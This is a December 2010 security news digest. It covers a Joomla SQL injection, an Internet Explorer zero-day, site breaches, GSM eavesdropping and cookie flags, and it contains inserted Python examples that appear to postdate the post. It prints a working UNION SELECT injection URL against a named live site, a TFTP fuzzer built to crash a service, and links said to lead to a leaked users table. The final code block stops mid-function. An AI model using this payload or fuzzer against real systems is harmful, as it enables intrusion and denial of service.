Thursday, 30 December 2010

Security Weekly News 30 December 2010 - Summary

Feedback and/or contributions to make this better are appreciated and welcome

Highlighted quotes of the week:

"Real IT/security talent will work where they make a difference, not where they reduce costs, "align w/business," or serve other lame ends." - Richard Bejtlich

"woodworking tools do not make chairs == security tools do not make security." - Rafal Los

"Sec guys cannot avoid IE use in the enterprise. But we could secure it a bit by using EMET. M$ should give support, though." - Román Medina-Heigl Hernández

"TSA bodyscans/pat-downs are to national security what WAF's DLP's and NAC's are to infosec." - Wim Remes

"To enforce a security policy for users without explanation is like forcing kids to eat vegetables... It will #fail" - Xavier Mertens

"...only 1 cookie was marked as both SECURE and HTTPOnly. Clearly these cookies should be rotated after an actual login, but why establish a session at all if you aren't going to protect it with these basic cookie flags?" - Michael Coates

"Avg # of days in a year a website is vulnerable to at least 1 *serious vulnerability: 200" - Jeremiah Grossman

"Any dictator would admire the uniformity and obedience of the U.S. media." - Noam Chomsky

"MD5, which usually poses a serious computational challenge to reverse <-- ROTFLMAO Serious news fail" - Martin Bos

"No wget? No problem ;) curl -LO -C - http://... <- and that's with resuming transfers" - Tomasz Miklas


To view the full security news for this week please click here (divided into categories; there is a category index at the top). The categories this week include (please click to go directly to what you care about): Hacking Incidents / Cybercrime, Unpatched Vulnerabilities, Software Updates, Business Case for Security, Web Technologies, Network Security, Mobile Security, Privacy, General, Tools, Funny

Highlighted news items of the week (No categories):

Not patched: Internet Explorer zero-day exploit - explanation and mitigation, [0day?] sql-injection in people.joomla.org From: 'Zerial.'

Updated/Patched: WordPress 3.0.4 critical security update, VirtualBox 4.0 Simplifies Virtual Operating System Management, Adds Extensions

 

 
Is your friend really a friend on Facebook?  [articles.orlandosentinel.com]
Scammers go where the people are - Facebook.
Facebook is the latest hot spot for swindlers in search of new victims.
And the world's most popular social-networking website can be a gold mine for such crooks, experts say.
Scams on social-media sites are much the same as the ones you may have received as e-mail, said Kevin Johnson, a consultant for Secure Ideas, which does security research.
"The big difference in the [social-networking] scams is the level of trust that the users have," he said. "People trust them more than they trust e-mail."

 
Burglary warning for residents  [www.northumbria.police.uk]
Advice in relation to house burglary:
* ensure your windows and doors are securely locked
* avoid leaving valuables where they can be seen through windows or within easy reach of windows and doors
* never leave your car keys on view or within easy reach of the door
* fit a house alarm
* install outside security lighting which is triggered by movement
* Make a list of your property and mark it with your postcode
* Use timers for lights and radios if you are going out at night
* Report any suspicious activity to police




Secure Network Administration highlights of the week (please remember this and more news related to this category can be found here: Network Security):


 

 
I received my Loggly beta account (thanks to them!) a few days ago and started to test this cloud service more intensively. I won't explain again what Loggly is; I already posted an article on this service.
For me, services like Loggly are the perfect cloud examples, with all the pros and cons. The smallest organizations may find here a perfect tool to analyze their logs with limited effort; on the other hand, there are two main issues regarding the security of your data sent to the cloud.

 
After suffering a massive outage last week, Skype CIO Lars Rabbe has now detailed what went wrong.
One of the root causes? A bug in the Skype for Windows client (version 5.0.0152).
Rabbe kicks off by explaining that a cluster of support servers responsible for offline instant messaging became overheated on Wednesday, December 22.
A number of Skype clients subsequently started receiving delayed responses from said overloaded servers, which weren't properly processed by the Windows client in question. This ultimately caused the affected version to malfunction.

 
I noticed while running a vulnerability scan with Nessus that Citrix Provisioning Server's TFTP service would crash. This service is used for PXE booting Citrix's virtual machines, so it is rather important.
I began to wonder if I could cause it to crash with my own evil packet. Of course, I could just sniff the traffic generated by Nessus, but that takes away from the challenge and it wouldn't tell me the exact portion of the packet that caused the crash.
I did a bit of research on TFTP by reading the RFC. In addition, I found that the Wikipedia article has a pretty good description as well as some nice pretty pictures. I thought the packet most likely to cause a crash would be the RRQ (read request) and specifically the filename attribute, since it has the most manipulable data. I then fired up Scapy.

 
VM Detection by In-The-Wild Malware  [www.networkforensics.com]
A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There are numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc.
Malware that attempts to detect if it's running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.

 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs. His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called 'new.htm', which contains obfuscated code as follows




Secure Development highlights of the week (please remember this and more news related to this category can be found here: Web Technologies):


 
IEEE Security and Privacy published an article that my group and I wrote some months ago, titled "Splitting the HTTPS Stream to Attack Secure Web Connections". You can find it here, check it out!

 
A study of HTTPOnly and SECURE cookie flag settings for the top 1000 websites serving HTTPS content
A basic HTTPS request was sent to the top 1000 websites. The HTTP responses were investigated to observe the usage of HTTPOnly and SECURE cookie flags. Here is what was found:

 
NoScript vs Insecure Cookies  [hackademix.net]
Mike Perry's Automated HTTPS Cookie Hijacking just made Slashdot's front page, so I decided to spend some time nesting a countermeasure inside NoScript's request intercepting guts.
The original idea comes from an email conversation I had with pdp just after his GMail account had been compromised: he suggested marking every cookie with the "Secure" attribute, causing the browser to send it exclusively over HTTPS connections.
Later he detailed this concept as a feature of his yet to be developed BrowserSecurify plugin:

 
Firefox 4 will not include a 'do not track' privacy option to block targeted advertising, according to the web browser's maker Mozilla.
The Firefox 4 browser will not ship with what we envision is the end-to-end solution. We don't think any browser can today.
- Firefox browser maker Mozilla
On Monday, an AFP report stated that Firefox 4, which is due for release in early 2011, would include a 'do not track' privacy option to foil behavioural advertising. Behavioural or targeted advertising products track a user's behaviour online, and serve ads based on the user's perceived interests.

 
Posted by: Giorgio in Anonymity, Mozilla, NoScript
Latest NoScript (2.0.9) supports the Do Not Track tracking opt-out proposal, joining AdBlock Plus in this experiment.
From now on, a web browser with NoScript installed warns every HTTP server it contacts that its user does not want to be tracked, i.e. that his data must not be collected for profiling and persistent identification purposes. I believe this is a safe assumption about the feelings of most if not all NoScript users.




Finally, I leave you with the secure development featured article of the week courtesy of OWASP (Development Guide Series):



Access Controls, Authentication, and Authorization need to be understood

- Multi-tier design: separate Web, application, middleware, and database tiers on DMZs.

- Proper due diligence needs to be taken to allow access only from certain IP(s) and port(s) over any connections to the application environment, such as business partner connections (VPN tunnels). Additionally, ensure that application controls are also used to validate proper authentication and authorization for the user or device accessing the application.

- Network-based stateful firewall allowing only the necessary communication ports. For example, this could be a stateful firewall allowing only access to a web application listening on ports 80 and 443 externally on a DMZ. From the web server DMZ only the necessary port(s) and source and destination IP(s) are allowed to the database DMZ.

- Web Application Firewall(s) could also be deployed to help with common input validation checks. These usually check for malicious syntax such as SQL injection or Cross-Site Scripting attacks, or sometimes even for sensitive data such as SSNs leaving the environment.

- Within each DMZ the use of Private VLANs should be considered to protect application components within the same layer 2 segment. For example, if there are multiple databases used by other applications within the same DMZ on the same switch, then PVLANs should be deployed. This would protect the application's database from being accessible from a compromised database on the same layer 2 segment.

- How will users or other applications authenticate to the application? In the case of a web application, is basic, NTLM, or form-based authentication, or even multi-factor authentication with an OTP or RSA server, necessary? How will thick clients or other applications be authenticated into the application environment, such as through certificates?

- Password policies should be created, understood, and adhered to when coding the application. This should include the secure storage of credentials, allowing only strong credentials, secure transmission of credentials, and a policy of least privilege. This should also include how passwords are reset securely.

- Role-based access controls based on least privilege are adhered to and enforced throughout the application.


Source: link



Happy New Year everybody!

Security Weekly News 30 December 2010 - Full list


Category Index




Hacking Incidents / Cybercrime


 
Server was cracked using 'local file inclusion' weakness and hacking group then worked through system to access passwords and source code, sources say

 
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
According to Denis Sinegubko, the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised websites and takes the form of an obfuscated JavaScript function.
When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new.htm page from aubreyserr.com, medien-verlag.de or yennicq.be.
According to statistics from Google's Safe Browsing service, around 2,000 websites link to these domains, giving a rough estimation of the attack's impact so far.
The page called by the IFrame loads a Hidden.jar applet deceptively titled 'Java Update.' This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe.

 
BackTrack Site Compromised  [www.backtrack-linux.org]
There's nothing like having your butt kicked Christmas morning, which is exactly what happened to us today. We were owned and exposed, in true fashion. The zine also mentioned other sites, as well as the ettercap project being backdoored.

 
addons.mozilla.org disclosure  [blog.mozilla.com]
On December 17th, Mozilla was notified by a security researcher that a partial database of addons.mozilla.org user accounts was mistakenly left on a Mozilla public server. The security researcher reported the issue to us via our web bounty program. We were able to account for every download of the database. This issue posed minimal risk to users, however as a precaution we felt we should disclose this issue to people affected and err on the side of disclosure.
The database included 44,000 inactive accounts using older, md5-based password hashes. We erased all the md5-passwords, rendering the accounts disabled. All current addons.mozilla.org accounts use a more secure SHA-512 password hash with per-user salts. SHA-512 and per user salts has been the standard storage method of password hashes for all active users since April 9th, 2009.
It is important to note that current addons.mozilla.org users and accounts are not at risk. Additionally, this incident did not impact any of Mozilla's infrastructure. This information was also sent to impacted users by email on December 27th.
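The two storage schemes contrasted in the Mozilla notice behave very differently when a table leaks. The following Python is an added example, not Mozilla's code: it shows that a bare MD5 digest is identical for every account with the same password (one cracked hash, or one precomputed table, opens all of them), while a per-user random salt prefixed to SHA-512 gives every account a distinct hash that must be attacked on its own. The `salt_hex$digest_hex` storage format, the 16-byte salt and the sample user records are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple


def md5_unsalted(password: str) -> str:
    """The legacy scheme: a bare MD5 of the password. Same password, same digest, every time."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def sha512_salted(password: str, salt: Optional[bytes] = None) -> str:
    """Per-user salted SHA-512. Stored as 'salt_hex$digest_hex' (the storage format is an assumption)."""
    if salt is None:
        salt = os.urandom(16)  # a fresh random salt for every account
    digest = hashlib.sha512(salt + password.encode("utf-8")).hexdigest()
    return f"{salt.hex()}${digest}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest = stored.split("$", 1)
    recomputed = hashlib.sha512(bytes.fromhex(salt_hex) + password.encode("utf-8")).hexdigest()
    return hmac.compare_digest(recomputed, digest)


def audit_shared_md5(records: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group users sharing an unsalted digest: one cracked hash in a group gives the password of all of them."""
    groups: Dict[str, List[str]] = {}
    for user, digest in records:
        groups.setdefault(digest, []).append(user)
    return {d: users for d, users in groups.items() if len(users) > 1}
```

One caveat the notice does not make: a single SHA-512 pass is fast, so a leaked salted table still allows a brute-force run per account; current practice is a deliberately slow, iterated function (PBKDF2, bcrypt or scrypt) with the same per-user salt.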

 
Recently, there have been reports in the news that an unauthorized third party viewed and modified the ettercap forums database (hosted on our Project web service). Among other things, this exposed hashed values of ettercap forum user passwords. (In other words, if you have an ettercap account/password and you're using the same password other places, such as your SourceForge account, it would be in your best interest to change them. And not do that anymore.)
Before I go on, I want to make it very clear that this had no effect on our downloads service, our hosted apps, SCMs, forums, etc.

 
Dumb admin over at Awakenedlands.com
Here's all their code and a decrypted users table 35k of emails and 16k of
md5 decrypted hashes.
I also include most of the tables name and data, and column names.
users list: http://bit.ly/hFW7Ak
code: http://bit.ly/gN5KFk

 
Software engineer Bruce Dang led Microsoft's analysis of the Stuxnet worm.
BERLIN - It is a mark of the extreme oddity of the Stuxnet computer worm that Microsoft's Windows vulnerability team learned of it first from an obscure Belarusian security company that even the Redmond security honchos had never heard of.
The sophisticated worm, which many computer experts believe was created as a specific attempt to sabotage Iran's nuclear power plant centrifuges, has written a new chapter in the history of computer security. Written to affect the very Siemens components used at Iran's facilities, some analysts have even speculated it may have been the work of a state, rather than of traditional underground virus writers.

 
In this Dec. 22, 2010 photo, attorney Daniel Balsam, who hates spam so much that he launched a Website Danhatesspam.com, poses outside in San Francisco. From San Francisco Superior Court small claims court to the 9th U.S. Circuit Court of Appeals, San Francisco-based Balsam has been wielding a one-man crusade against e-mail marketers he alleges run afoul of federal and state anti-spamming laws with dozens of lawsuits filed even before he graduated law school in 2008. (AP Photo/Eric Risberg)
SAN FRANCISCO -- Daniel Balsam hates spam. Most everybody does, of course. But he has acted on his hate as few have, going far beyond simply hitting the delete button. He sues them.
Eight years ago, Balsam was working as a marketer when he received one too many e-mail pitches to enlarge his breasts.




Unpatched Vulnerabilities


 
A remote code execution vulnerability against Internet Explorer was announced recently, and a proof-of-concept exploit has already been added to the Metasploit products.
Microsoft doesn't have a patch out yet, but it has published a workaround which protects against this exploit, and others of a similar sort.
I urge you to familiarise yourself with the workaround, because it improves your general security posture as well as mitigating this particular problem.
The vulnerability was published earlier in the month on a full-disclosure security list. Full disclosure means that you simply tell the world about a newly-found bug, and let the world sort things out. The theory behind this is that it prevents sluggish software vendors from simply ignoring the problem and not fixing it. The disadvantage, of course, is that it alerts the Bad Guys at the same time as everyone else.

 
Hi folks,
Exists an SQL-Injection on http://people.joomla.org/events.html?groupid=1%20or%201=0%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70;%20--
I suppose it affects any site that uses this plugin, extension or module too.




Software Updates


 
Version 3.0.4 of WordPress is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES.

 
Windows/Mac/Linux: VirtualBox 4.0 makes creating virtual operating systems a lot less bothersome. The interface is easier to get around, the virtual machines easier to move or wipe away, display and hardware compatibility is improved, and new 'extensions' can add new capabilities.




Business Case for Security


 
Burglary warning for residents  [www.northumbria.police.uk]
Advice in relation to house burglary:
* ensure your windows and doors are securely locked
* avoid leaving valuables where they can be seen through windows or within easy reach of windows and doors
* never leave your car keys on view or within easy reach of the door
* fit a house alarm
* install outside security lighting which is triggered by movement
* Make a list of your property and mark it with your postcode
* Use timers for lights and radios if you are going out at night
* Report any suspicious activity to police




Web Technologies


 
IEEE Security and Privacy published an article that my group and I wrote some months ago, titled "Splitting the HTTPS Stream to Attack Secure Web Connections". You can find it here, check it out!

 
A study of HTTPOnly and SECURE cookie flag settings for the top 1000 websites serving HTTPS content
A basic HTTPS request was sent to the top 1000 websites. The HTTP responses were investigated to observe the usage of HTTPOnly and SECURE cookie flags. Here is what was found:

 
NoScript vs Insecure Cookies  [hackademix.net]
Mike Perry's Automated HTTPS Cookie Hijacking just made Slashdot's front page, so I decided to spend some time nesting a countermeasure inside NoScript's request intercepting guts.
The original idea comes from an email conversation I had with pdp just after his GMail account had been compromised: he suggested marking every cookie with the "Secure" attribute, causing the browser to send it exclusively over HTTPS connections.
Later he detailed this concept as a feature of his yet to be developed BrowserSecurify plugin:
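Both the cookie-flag study and the NoScript countermeasure above come down to reading Set-Cookie headers and checking two attributes. The Python below is an added example, not code from the study or from NoScript: it parses the headers of an HTTP response, reports which cookies lack Secure and HttpOnly, and applies the rewrite NoScript performs on cookies received over HTTPS, appending Secure where it is missing. The three sample headers are constructed for the example and were not taken from any of the sites surveyed.

```python
from typing import Dict, List

# Constructed sample: three cookies as a server might set them on one HTTPS response.
SAMPLE_HEADERS = [
    "Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly; Secure",
    "Set-Cookie: prefs=dark; Path=/; Expires=Wed, 30 Dec 2020 00:00:00 GMT",
    "Set-Cookie: tracker=xyz; Domain=.example.com; HttpOnly",
]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split one Set-Cookie header into name, value and a dict of attributes (attribute names lower-cased).
    Flag attributes without a value (HttpOnly, Secure) are stored as True."""
    value = header.split(":", 1)[1].strip() if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": cookie_value, "attrs": attrs}


def audit(headers: List[str]) -> Dict[str, List[str]]:
    """For every cookie in the response, list the protective flags it is missing."""
    report: Dict[str, List[str]] = {}
    for h in headers:
        c = parse_set_cookie(h)
        attrs = c["attrs"]
        missing = []
        if "secure" not in attrs:
            missing.append("Secure")     # without it the browser will also send the cookie over plain HTTP
        if "httponly" not in attrs:
            missing.append("HttpOnly")   # without it script on the page can read it
        report[c["name"]] = missing
    return report


def force_secure(header: str, over_https: bool = True) -> str:
    """The NoScript-style rewrite: a cookie arriving over HTTPS without Secure gets the flag added.
    A cookie first set over plain HTTP is not rescued by this; its value has already crossed the wire in clear."""
    c = parse_set_cookie(header)
    if not over_https or "secure" in c["attrs"]:
        return header
    return header.rstrip("; ") + "; Secure"
```

Run `audit` over the headers of the first response a site returns, before any login: the quote from Michael Coates at the top of this issue is exactly the case where a session cookie is issued at that point with neither flag.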




Network Security


 

 
I received my Loggly beta account (thanks to them!) a few days ago and started to test this cloud service more intensively. I won't explain again what Loggly is; I already posted an article on this service.
For me, services like Loggly are the perfect cloud examples, with all the pros and cons. The smallest organizations may find here a perfect tool to analyze their logs with limited effort; on the other hand, there are two main issues regarding the security of your data sent to the cloud.

 
After suffering a massive outage last week, Skype CIO Lars Rabbe has now detailed what went wrong.
One of the root causes? A bug in the Skype for Windows client (version 5.0.0152).
Rabbe kicks off by explaining that a cluster of support servers responsible for offline instant messaging became overheated on Wednesday, December 22.
A number of Skype clients subsequently started receiving delayed responses from said overloaded servers, which weren't properly processed by the Windows client in question. This ultimately caused the affected version to malfunction.

 
Several years ago, I had some fun: I streamed live audio, and eventually video, through the DNS.
Heh. I was young, and it worked through pretty much any firewall. (Still does, actually.) It wasn't meant to be a serious transport though. DNS was not designed to traffic large amounts of data. It's a bootstrapper.
But then, we do a lot of things with protocols that we weren't "supposed" to do. Where do we draw the line?
Obviously DNS is not going to become the next great CDN hack (though I had a great trick for that too). But there's a real question: How much data should we be putting into the DNS?

 
I noticed while running a vulnerability scan with Nessus that Citrix Provisioning Server's TFTP service would crash. This service is used for PXE booting Citrix's virtual machines, so it is rather important.
I began to wonder if I could cause it to crash with my own evil packet. Of course, I could just sniff the traffic generated by Nessus, but that takes away from the challenge and it wouldn't tell me the exact portion of the packet that caused the crash.
I did a bit of research on TFTP by reading the RFC. In addition, I found that the Wikipedia article has a pretty good description as well as some nice pretty pictures. I thought the packet most likely to cause a crash would be the RRQ (read request) and specifically the filename attribute, since it has the most manipulable data. I then fired up Scapy.
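TFTP is simple enough that the read request can be assembled by hand, which makes the field being manipulated explicit. The Python below is an added example, not the author's Scapy script: it packs the RFC 1350 RRQ (2-byte opcode 1, filename, NUL, mode, NUL) with `struct`, parses it back so the filename field is visible, and generates the series of growing-filename requests one would send while narrowing down the length at which the service stops answering. The send helper uses the standard `socket` module; the target host is a placeholder to be supplied by the caller, and nothing is transmitted when the module is imported.

```python
import socket
import struct
from typing import List, Tuple

TFTP_PORT = 69
OP_RRQ = 1  # RFC 1350 opcodes: 1 RRQ, 2 WRQ, 3 DATA, 4 ACK, 5 ERROR
OP_WRQ = 2


def build_rrq(filename: bytes, mode: bytes = b"octet") -> bytes:
    """RRQ layout: opcode (network byte order) | filename | 0x00 | mode | 0x00."""
    if b"\x00" in filename or b"\x00" in mode:
        raise ValueError("filename and mode are NUL-terminated; they cannot contain NUL")
    return struct.pack("!H", OP_RRQ) + filename + b"\x00" + mode + b"\x00"


def parse_request(packet: bytes) -> Tuple[int, bytes, bytes]:
    """Inverse of build_rrq: (opcode, filename, mode), raising on anything that is not a well-formed request."""
    if len(packet) < 4:
        raise ValueError("packet too short for a TFTP request")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError(f"not a read/write request: opcode {opcode}")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("expected two NUL-terminated fields")
    return opcode, fields[0], fields[1]


def fuzz_series(start: int = 16, stop: int = 4096) -> List[bytes]:
    """Read requests whose filename doubles in length each step (16, 32, ... 4096 bytes).
    Bisect between the last request the service survives and the first that kills it."""
    packets = []
    length = start
    while length <= stop:
        packets.append(build_rrq(b"A" * length))
        length *= 2
    return packets


def send_rrq(packet: bytes, host: str, port: int = TFTP_PORT, timeout: float = 2.0) -> bool:
    """Send one request and report whether the service still answers (DATA or ERROR) within the timeout.
    A target that answered the previous packet and goes silent on this one is the crash signal.
    host is a placeholder for a lab system; this function is never called at import time."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (host, port))
        try:
            s.recvfrom(65535)
            return True
        except socket.timeout:
            return False
```

Send a harmless request (`build_rrq(b"nonexistent")`) between fuzz packets to confirm the service is still alive; a crash shows up as the first silent reply after a sequence of ERROR responses.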

 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs. His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called 'new.htm', which contains obfuscated code as follows

 
WPA-PSK Wordlist Download - 13GB  [hashcrack.blogspot.com]
Looks like my lists got compiled into a large collection of wpa passwords - well worth the bandwidth. =)
Although, since it's a WPA wordlist, everything below 8 chars long was removed, which is bad for other practical uses.

 
VM Detection by In-The-Wild Malware  [www.networkforensics.com]
A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There are numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc.
Malware that attempts to detect if it's running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.




Mobile Security


 
Antid0te  [antid0te.com]
Address Space Layout Randomization (ASLR) and more for jailbroken iPhones.
If you are interested in the techniques used to add ASLR to your iPhone here are the slides of my talk at POC 2010. [PDF]
If you want to see the ASLR in action have a look at the GDB output for MobileSafari without ASLR and with ASLR.
In the meanwhile part of my Antid0te research has been applied to the dynamic linker of Mac OS X Snow Leopard. By rebasing the dynamic linker dyld you can make your Mac OS X Snow Leopard installation more resilient against attacks. Read the full article here.

 
Breaking GSM Security With a Phone
Whatever assurances have been given about the security of GSM cellphone calls, forget about them now.
Speaking at the Chaos Computer Club (CCC) Congress here today, a pair of researchers demonstrated a start-to-finish means of eavesdropping on encrypted GSM cellphone calls and text messages, using only four sub-$15 telephones as network 'sniffers,' a laptop computer and a variety of open source software.

 
According to security experts, an 'SMS of death' threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax and LG mobiles. In a presentation given to the 27th Chaos Communication Congress (27C3) in Berlin on Monday, Collin Mulliner and Nico Golde, security researchers at TU Berlin, claimed that sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks.




Privacy


 
Firefox 4 will not include a 'do not track' privacy option to block targeted advertising, according to the web browser's maker Mozilla.
The Firefox 4 browser will not ship with what we envision is the end-to-end solution. We don't think any browser can today.
- Firefox browser maker Mozilla
On Monday, an AFP report stated that Firefox 4, which is due for release in early 2011, would include a 'do not track' privacy option to foil behavioural advertising. Behavioural or targeted advertising products track a user's behaviour online, and serve ads based on the user's perceived interests.

 
Posted by: Giorgio in Anonymity, Mozilla, NoScript
Latest NoScript (2.0.9) supports the Do Not Track tracking opt-out proposal, joining AdBlock Plus in this experiment.
From now on, a web browser with NoScript installed warns every HTTP server it contacts that its user does not want to be tracked, i.e. that his data must not be collected for profiling and persistent identification purposes. I believe this is a safe assumption about the feelings of most if not all NoScript users.

 
Earlier today I mentioned the report from a reader who had enjoyed his first enhanced pat-down. This reader, Ari Ofsevit, has noticed the same thing many others have reported: the high variability in whether airports with the new scanning systems are actually making passengers go through them. For instance, last month when I was traveling through San Diego (home of the original 'don't touch my junk' contretemps), I was allowed to choose between the new machines and the plain old metal detectors. I chose the old ones.

 
A 56-year-old rape survivor with a pacemaker refused a groping by TSA agents at Austin Bergstrom airport, and was subsequently arrested, pushed to the floor, dragged, and banned from flying from the airport.




General


 
Is your friend really a friend on Facebook?  [articles.orlandosentinel.com]
Scammers go where the people are - Facebook.
Facebook is the latest hot spot for swindlers in search of new victims.
And the world's most popular social-networking website can be a gold mine for such crooks, experts say.
Scams on social-media sites are much the same as the ones you may have received as e-mail, said Kevin Johnson, a consultant for Secure Ideas, which does security research.
"The big difference in the [social-networking] scams is the level of trust that the users have," he said. "People trust them more than they trust e-mail."

 
After the UK banking trade association wrote to Cambridge university to have a student's master's thesis censored because it documented a well-known flaw in the chip-and-PIN system, Cambridge's Ross Anderson sent an extremely stiff note in reply:
Second, you seem to think that we might censor a student's thesis, which is lawful and already in the public domain, simply because a powerful interest finds it inconvenient. This shows a deep misconception of what universities are and how we work. Cambridge is the University of Erasmus, of Newton, and of Darwin; censoring writings that offend the powerful is offensive to our deepest values.

 
Banknotes go electric to outwit counterfeiters  [www.newscientist.com]
GOOD old-fashioned cash is to go down the electronic route, now that it is possible to stamp simple electronic circuits directly onto banknotes.
Modern banknotes contain up to 50 anti-counterfeiting features, but adding electronic circuits programmed to confirm the note's authenticity is perhaps the ultimate deterrent, and would also help to simplify banknote tracking.
Silicon-based electronic circuits are clearly too thick to be incorporated into thin and fragile banknotes, but semiconducting organic molecules might be a viable alternative.

 
So far, the analyses of OpenBSD's crypto and IPSec code have not provided any indication that the system contains back doors for listening to encrypted VPN connections. The OpenBSD developers started the code audit to investigate allegations made by Gregory Perry, the former CTO of crypto company NetSec. In an email to OpenBSD founder Theo de Raadt, Perry had accused developer Jason Wright and others of having built back doors into the IPSec stack. De Raadt made the email public and presented Perry's allegations for discussion.




Tools


 
Happy Holidays everyone! This is the latest version of the Social-Engineer Toolkit, codename "Happy Holidays". This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster, as well as an overhaul of optimizations through the entire code base. The next version, 1.2, will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.
Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.

 
syslog2loggly  [github.com]
Perl script to send Syslog events to the Loggly cloud via HTTPS (www.loggly.com) http://blog.rootshell.be/2010/12/27/send-events-safely-to-the-loggly-cloud

 
The PlugBot  [theplugbot.com]
PlugBot is a hardware botnet project. It's a covert penetration testing device (bot) designed for covert use during physical penetration tests. PlugBot is a research project led by Jeremiah Talamantes, a Penetration Tester and Security Researcher for RedTeam Security.

 
Ephemeral Diffie-Hellman key exchange (EDH or DHE, depending on where you look) allows two parties with no prior knowledge of each other to establish a shared secret. In SSL, DHE is used together with some method of authentication (most commonly RSA) in the handshake phase. Ephemeral DH is valued because it provides perfect forward secrecy -- the session keys cannot be recovered if the authentication method is broken (e.g., someone retrieves the server's private key).
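The exchange described above, as an added example in Python using only the standard library (not the tool the post refers to). A safe prime is found deterministically at import so the block is self-contained; a 128-bit modulus is a demonstration size only, and a real deployment uses a published 2048-bit or larger group (RFC 3526 or RFC 7919). Each party draws a fresh random exponent for the session, which is what makes the exchange ephemeral. The authentication half of the handshake, the server signing its DH value with its long-term RSA key, is deliberately left out: the point shown is that a recorded transcript contains only the two public values, that two sessions never share a secret, and that once the exponents are discarded the long-term key contributes nothing toward recovering the session secret.

```python
import hashlib
import secrets
from typing import Optional, Tuple

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n: int) -> bool:
    """Trial division, then Miller-Rabin with the twelve smallest primes as bases; ample for demo-sized n."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def find_safe_prime(bits: int) -> int:
    """First safe prime p = 2q + 1 (q prime) with q >= 2**(bits-2). Deterministic, so every run uses the same group."""
    q = (1 << (bits - 2)) | 1
    while not (is_probable_prime(q) and is_probable_prime(2 * q + 1)):
        q += 2
    return 2 * q + 1


P = find_safe_prime(128)  # demonstration size only; real groups are 2048 bits or more
G = 2                     # in a safe-prime group 2 has order q or 2q, so it lands in a large subgroup


class Party:
    """One endpoint. The private exponent lives for one session and is never written anywhere."""

    def __init__(self, p: int = P, g: int = G) -> None:
        self.p, self.g = p, g
        self._x: Optional[int] = secrets.randbelow(p - 2) + 1  # fresh per session: the 'ephemeral' part
        self.public = pow(g, self._x, p)                        # the only value that goes on the wire

    def shared_secret(self, peer_public: int) -> bytes:
        """Derive the session key from the peer's value. 0, 1 and p-1 are refused: they force a trivial secret."""
        if self._x is None:
            raise RuntimeError("session ended; exponent already discarded")
        if not 1 < peer_public < self.p - 1:
            raise ValueError("peer public value outside the group")
        z = pow(peer_public, self._x, self.p)
        return hashlib.sha256(z.to_bytes((self.p.bit_length() + 7) // 8, "big")).digest()

    def discard(self) -> None:
        """Session over: forget the exponent. A later seizure of the long-term key finds nothing to use here."""
        self._x = None


def run_handshake() -> Tuple[bytes, bytes]:
    """Both sides compute the secret from the other's public value, then throw their exponents away."""
    client, server = Party(), Party()
    k_client = client.shared_secret(server.public)
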